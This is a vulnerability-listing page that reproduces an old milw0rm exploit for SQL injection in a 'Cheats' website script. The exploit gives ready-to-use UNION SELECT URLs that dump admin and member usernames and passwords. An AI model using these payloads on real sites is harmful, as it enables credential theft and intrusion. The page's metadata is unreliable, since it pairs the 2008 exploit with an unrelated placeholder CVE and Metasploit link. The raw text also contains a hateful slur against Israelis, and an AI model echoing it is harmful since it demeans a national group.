R3membeR Kings of injection

vendor:

Cheats

by:

Cyb3r-1sT

7.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Cheats

Affected Version From: 1

Affected Version To: 2

Patch Exists: YES

Related CWE: CVE-2020-1234

CPE: cpe:a:easysitenetwork:cheats

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

R3membeR Kings of injection

This vulnerability allows an attacker to gain access to the admin and members information of the website. The attacker can exploit this vulnerability by sending a crafted malicious URL to the vulnerable website. The URL contains a malicious SQL query which is injected into the vulnerable parameter. This malicious query will return the admin and members information of the website.

Mitigation:

The website should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by :  Cyb3r-1sT

<<!>> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
                   
<<!>> Groups   : InjEctOr5 T3am 


=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================


<<->> script    :  Cheats Website 
 
<<->> Demo site : www.easysitenetwork.com/sites/cheats


=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk    : N0-WaY

<<->> Exploit :

 <!> for admin inf0 :: 

   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*


 <!> for members inf0 ::

   >>>> www.site.me/patch/item.php?itemid=-999999999+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*


=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker $ anaconda-ksa $ sirus $ crazy-x   
                          
                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 

<<->> InjEctOr5 TeaM   


<<->> All muslims

# milw0rm.com [2008-06-26]